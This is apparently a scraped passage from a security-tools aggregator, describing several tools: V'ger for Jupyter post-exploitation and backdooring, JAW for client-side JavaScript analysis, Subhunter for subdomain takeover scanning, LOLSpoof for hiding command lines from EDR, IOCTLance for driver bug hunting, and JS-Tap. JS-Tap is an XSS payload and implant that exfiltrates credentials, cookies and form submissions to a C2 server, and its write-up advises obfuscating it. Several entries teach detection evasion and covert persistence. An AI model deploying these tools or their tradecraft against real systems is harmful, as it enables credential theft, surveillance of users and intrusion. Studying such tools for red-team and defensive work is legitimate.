        [*] MAC Address: 00:0c:29:c5:82:81
        --------------------------------------------------

        Outro

        I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




        Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

        By: Zion3R

        V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

        User Stories

        • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
        • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
        • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
        • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

        Usage

        Initial Setup

        1. pip install vger
        2. vger --help

        Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

        Commands

        Once a connection is established, users drop into a nested set of menus.

        The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

        These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

        Experimental

        With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

        There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

        Examples



        JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

        By: Zion3R

        An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

        This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

        JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

        Release Notes:


        Overview of JAW

        The architecture of the JAW is shown below.

        Test Inputs

        JAW can be used in two distinct ways:

        1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

        2. Web Application Analysis: Analyze a web application by providing a single seed URL.

        Data Collection

        • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

        HPG Construction

        • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

        • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

        Analysis and Outputs

        • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

        • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

        • The outputs will be stored in the same folder as that of input.

        Setup

        The installation script relies on the following prerequisites: - Latest version of npm package manager (node js) - Any stable version of python 3.x - Python pip package manager

        Afterwards, install the necessary dependencies via:

        $ ./install.sh

        For detailed installation instructions, please see here.

        Quick Start

        Running the Pipeline

        You can run an instance of the pipeline in a background screen via:

        $ python3 -m run_pipeline --conf=config.yaml

        The CLI provides the following options:

        $ python3 -m run_pipeline -h

        usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

        This script runs the tool pipeline.

        optional arguments:
        -h, --help show this help message and exit
        --conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
        --site SITE, -S SITE website to test; overrides config file (default: None)
        --list LIST, -L LIST site list to test; overrides config file (default: None)
        --from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
        --to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

        Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

        Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

        Quick Example

        For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

        $ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

        Crawling and Data Collection

        This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.

        JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

        Playwright CLI with Foxhound

        This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

        $ cd crawler
        $ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

        The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

        Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

        Puppeteer CLI

        To start the crawler, do:

        $ cd crawler
        $ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

        See here for more information.

        Selenium CLI

        To start the crawler, do:

        $ cd crawler/hpg_crawler
        $ vim docker-compose.yaml # set the websites you want to crawl here and save
        $ docker-compose build
        $ docker-compose up -d

        Please refer to the documentation of the hpg_crawler here for more information.

        Graph Construction

        HPG Construction CLI

        To generate an HPG for a given (set of) JavaScript file(s), do:

        $ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

        optional arguments:
        --lang: language of the input program
        --graphid: an identifier for the generated HPG
        --input: path of the input program(s)
        --output: path of the output HPG, must be i
        --mode: determines the output format (csv or graphML)

        HPG Import CLI

        To import an HPG inside a neo4j graph database (docker instance), do:

        $ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
        $ python3 -m hpg_neo4j.hpg_import -h

        usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

        This script imports a CSV of a property graph into a neo4j docker database.

        optional arguments:
        -h, --help show this help message and exit
        --rpath P relative path to the folder containing the graph CSV files inside the `data` directory
        --id I an identifier for the graph or docker container
        --nodes N the name of the nodes csv file (default: nodes.csv)
        --edges E the name of the relations csv file (default: rels.csv)

        HPG Construction and Import CLI (v1)

        In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

        $ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

        Specification of Parameters:

        • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
        • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
        • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
        • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
        • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false to exclude (default: request_logs_short.out).
        • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
        • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
        • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

        For more information, you can use the help CLI provided with the graph construction API:

        $ python3 -m engine.api -h

        Security Analysis

        The constructed HPG can then be queried using Cypher or the NeoModel ORM.

        Running Custom Graph traversals

        You should place and run your queries in analyses/<ANALYSIS_NAME>.

        Option 1: Using the NeoModel ORM (Deprecated)

        You can use the NeoModel ORM to query the HPG. To write a query:

        • (1) Check out the HPG data model and syntax tree.
        • (2) Check out the ORM model for HPGs
        • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
        $ python3 -m analyses.example.example_query_orm  

        For more information, please see here.

        Option 2: Using Cypher Queries

        You can use Cypher to write custom queries. For this:

        • (1) Check out the HPG data model and syntax tree.
        • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
        $ python3 -m analyses.example.example_query_cypher

        For more information, please see here.

        Vulnerability Detection

        This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering

        Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

        request_hijacking:
        enabled: true
        # [...]
        #
        domclobbering:
        enabled: false
        # [...]

        cs_csrf:
        enabled: false
        # [...]

        Step 2. Run an instance of the pipeline with:

        $ python3 -m run_pipeline --conf=config.yaml

        Hint. You can run multiple instances of the pipeline under different screens:

        $ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
        $ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
        $ # [...]

        To generate parallel configuration files automatically, you may use the generate_config.py script.

        How to Interpret the Output of the Analysis?

        The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

        An example output entry is shown below:

        [*] Tags: ['WIN.LOC']
        [*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
        [*] Location: 29
        [*] Function: ajax
        [*] Template: ajaxloc + "/bearer1234/"
        [*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

        1:['WIN.LOC'] variable=ajaxloc
        0 (loc:6)- var ajaxloc = window.location.href

        This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/, where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

        Test Web Application

        In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

        First, install the dependencies via:

        $ cd tests/test-webapp
        $ npm install

        Then, run the application in a new screen:

        $ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

        Detailed Documentation.

        For more information, visit our wiki page here. Below is a table of contents for quick access.

        The Web Crawler of JAW

        Data Model of Hybrid Property Graphs (HPGs)

        Graph Construction

        Graph Traversals

        Contribution and Code Of Conduct

        Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

        Academic Publication

        If you use the JAW for academic research, we encourage you to cite the following paper:

        @inproceedings{JAW,
        title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
        author= {Soheil Khodayari and Giancarlo Pellegrino},
        booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
        year = {2021},
        address = {Vancouver, B.C.},
        publisher = {{USENIX} Association},
        }

        Acknowledgements

        JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

        @tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



        Subhunter - A Fast Subdomain Takeover Tool

        By: Zion3R


        Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


        Features:

        • Auto update
        • Uses random user agents
        • Built in Go
        • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

        Installation:

        Option 1:

        Download from releases

        Option 2:

        Build from source:

        $ git clone https://github.com/Nemesis0U/Subhunter.git
        $ go build subhunter.go

        Usage:

        Options:

        Usage of subhunter:
        -l string
        File including a list of hosts to scan
        -o string
        File to save results
        -t int
        Number of threads for scanning (default 50)
        -timeout int
        Timeout in seconds (default 20)

        Demo (Added fake fingerprint for POC):

        ./Subhunter -l subdomains.txt -o test.txt

        ____ _ _ _
        / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
        \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
        ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
        |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


        A fast subdomain takeover tool

        Created by Nemesis

        Loaded 88 fingerprints for current scan

        -----------------------------------------------------------------------------

        [+] Nothing found at www.ubereats.com: Not Vulnerable
        [+] Nothing found at testauth.ubereats.com: Not Vulnerable
        [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
        [+] Nothing found at about.ubereats.com: Not Vulnerable
        [+] Nothing found at beta.ubereats.com: Not Vulnerable
        [+] Nothing found at ewp.ubereats.com: Not Vulnerable
        [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
        [+] Nothing found at guest.ubereats.com: Not Vulnerable
        [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
        [+] Nothing found at info.ubereats.com: Not Vulnerable
        [+] Nothing found at learn.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants.ubereats.com: Not Vulnerable
        [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
        [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
        [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
        [+] Nothing found at messages.ubereats.com: Not Vulnerable
        [+] Nothing found at order.ubereats.com: Not Vulnerable
        [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
        [+] Nothing found at payments.ubereats.com: Not Vulnerable
        [+] Nothing found at static.ubereats.com: Not Vulnerable

        Subhunter exiting...
        Results written to test.txt




        LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

        By: Zion3R


        LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


        Why

        Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

        How

        1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
        2. Spawns that suspended LOLBin with the spoofed command line
        3. Gets the remote PEB address
        4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
        5. Gets the address of the command line unicode buffer
        6. Overrides the fake command line with the real one
        7. Resumes the main thread

        Opsec considerations

        Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

        Build

        Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

        nimble install winim

        Known issue

        Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



        Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

        By: Zion3R

        Description

        Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


        Features

        Target Vulnerability Types

        • map physical memory
        • controllable process handle
        • buffer overflow
        • null pointer dereference
        • read/write controllable address
        • arbitrary shellcode execution
        • arbitrary wrmsr
        • arbitrary out
        • dangerous file operation

        Optional Customizations

        • length limit
        • loop bound
        • total timeout
        • IoControlCode timeout
        • recursion
        • symbolize data section

        Build

        Docker (Recommand)

        docker build .

        Local

        dpkg --add-architecture i386
        apt-get update
        apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
        openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
        libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
        libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
        libffi-dev libxslt1-dev libxml2-dev

        pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

        Analysis

        # python3 analysis/ioctlance.py -h
        usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
        [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
        path

        positional arguments:
        path dir (including subdirectory) or file path to the driver(s) to analyze

        optional arguments:
        -h, --help show this help message and exit
        -i IOCTLCODE, --ioctlcode IOCTLCODE
        analyze specified IoControlCode (e.g. 22201c)
        -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
        total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
        -t TIMEOUT, --timeout TIMEOUT
        timeout for analyze each IoControlCode (default 40, 0 to unlimited)
        -l LENGTH, --length LENGTH
        the limit of number of instructions for technique L engthLimiter (default 0, 0
        to unlimited)
        -b BOUND, --bound BOUND
        the bound for technique LoopSeer (default 0, 0 to unlimited)
        -g GLOBAL_VAR, --global_var GLOBAL_VAR
        symbolize how many bytes in .data section (default 0 hex)
        -a ADDRESS, --address ADDRESS
        address of ioctl handler to directly start hunting with blank state (e.g.
        140005c20)
        -e EXCLUDE, --exclude EXCLUDE
        exclude function address split with , (e.g. 140005c20,140006c20)
        -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
        -r, --recursion do not kill state if detecting recursion (default False)
        -c, --complete get complete base state (default False)
        -d, --debug print debug info while analyzing (default False)

        Evaluation

        # python3 evaluation/statistics.py -h
        usage: statistics.py [-h] [-w] path

        positional arguments:
        path target dir or file path

        optional arguments:
        -h, --help show this help message and exit
        -w, --wdm copy the wdm drivers into <path>/wdm

        Test

        1. Compile the testing examples in test to generate testing driver files.
        2. Run IOCTLance against the drvier files.

        Reference



        JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

        By: Zion3R


        JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


        Changelogs

        Major changes are documented in the project Announcements:
        https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

        Demo

        You can read the original blog post about JS-Tap here:
        javascript-for-red-teams">https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

        Short demo from ShmooCon of JS-Tap version 1:
        https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

        Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
        https://youtu.be/aWvNLJnqObQ?t=11719

        A demo can also be seen in this webinar:
        https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

        Upgrade warning

        I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

        Introduction

        JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

        The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

        Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

        The example JS-Tap payload is contained in the telemlib.js file in the payloads directory, however any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using in an engagement strongly consider changing the naming of endpoints, stripping comments, and highly obfuscating the payload.

        Make sure you review the configuration section below carefully before using on a publicly exposed server.

        Data Collected

        • Client IP address, OS, Browser
        • User inputs (credentials, etc.)
        • URLs visited
        • Cookies (that don't have httponly flag set)
        • Local Storage
        • Session Storage
        • HTML code of pages visited (if feature enabled)
        • Screenshots of pages visited
        • Copy of Form Submissions
        • Copy of XHR API calls (if monkeypatch feature enabled)
          • Endpoint
          • Method (GET, POST, etc.)
          • Headers set
          • Request body and response body
        • Copy of Fetch API calls (if monkeypatch feature enabled)
          • Endpoint
          • Method (GET, POST, etc.)
          • Headers set
          • Request body and response body

        Note: ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode only Fetch API can be copied currently.

        Operating Modes

        The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function, search for the window.taperMode variable.

        Trap Mode

        Trap mode is typically the mode you would use as a XSS payload. Execution of XSS payloads is often fleeting, the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

        Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

        In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

        Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

        Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. current location). The trap will set when the user visits the login page, and they'll hopefully contine into the authenticated portions of the application inside the iframe trap.

        A user refreshing the page will generally break/escape the iframe trap.

        Implant Mode

        Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

        A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

        Installation and Start

        Requires python3. A large number of dependencies are required for the jsTapServer, you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

        Example:

        mkdir jsTapEnvironment
        python3 -m venv jsTapEnvironment
        source jsTapEnvironment/bin/activate
        cd jsTapEnvironment
        git clone https://github.com/hoodoer/JS-Tap
        cd JS-Tap
        pip3 install -r requirements.txt

        run in debug/single thread mode:
        python3 jsTapServer.py

        run with gunicorn multithreaded (production use):
        ./jstapRun.sh

        A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

        If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

        Note that on Mac I also had to install libmagic outside of python.

        brew install libmagic

        Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

        Configuration

        JS-Tap Server Configuration

        Debug/Single thread config

        If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

        Proxy Mode

        For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

        If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.

        When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

        Data Directory

        The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.

        Server Port

        To change the server port configuration see the last line of jsTapServer.py

        app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

        Gunicorn Production Configuration

        Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

        A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.

        At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;

        Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

        Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
        openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

        telemlib.js Configuration

        These configuration variables are in the initGlobals() function.

        JS-Tap Server Location

        You need to configure the payload with the URL of the JS-Tap server it will connect back to.

        window.taperexfilServer = "https://127.0.0.1:8444";

        Mode

        Set to either trap or implant This is set with the variable:

        window.taperMode = "trap";
        or
        window.taperMode = "implant";

        Trap Mode Starting Page

        Only needed for trap mode. See explanation in Operating Modes section above.
        Sets the page the user starts on when the iFrame trap is set.

        window.taperstartingPage = "http://targetapp.com/somestartpage";

        If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

        window.taperstartingPage = window.location.href;

        Client Tag

        Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.

        This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.

        window.taperTag = 'whatever';

        Custom Payload Tasks

        Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.

        window.taperTaskCheck        = true;
        window.taperTaskCheckDelay = 5000;
        window.taperTaskJitterBottom = -2000;
        window.taperTaskJitterTop = 2000;

        Exfiltrate HTML

        true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

        window.taperexfilHTML = true;

        Copy Form Submissions

        true/false setting on whether to intercept a copy of all form posts.

        window.taperexfilFormSubmissions = true;

        MonkeyPatch APIs

        Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.

        window.monkeyPatchAPIs = true;

        Screenshot after API calls

        By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.

        window.postApiCallScreenshot = true;
        window.screenshotDelay = 1000;

        JS-Tap Portal

        Login with the admin credentials provided by the server script on startup.

        Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

        The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

        Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.

        When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.

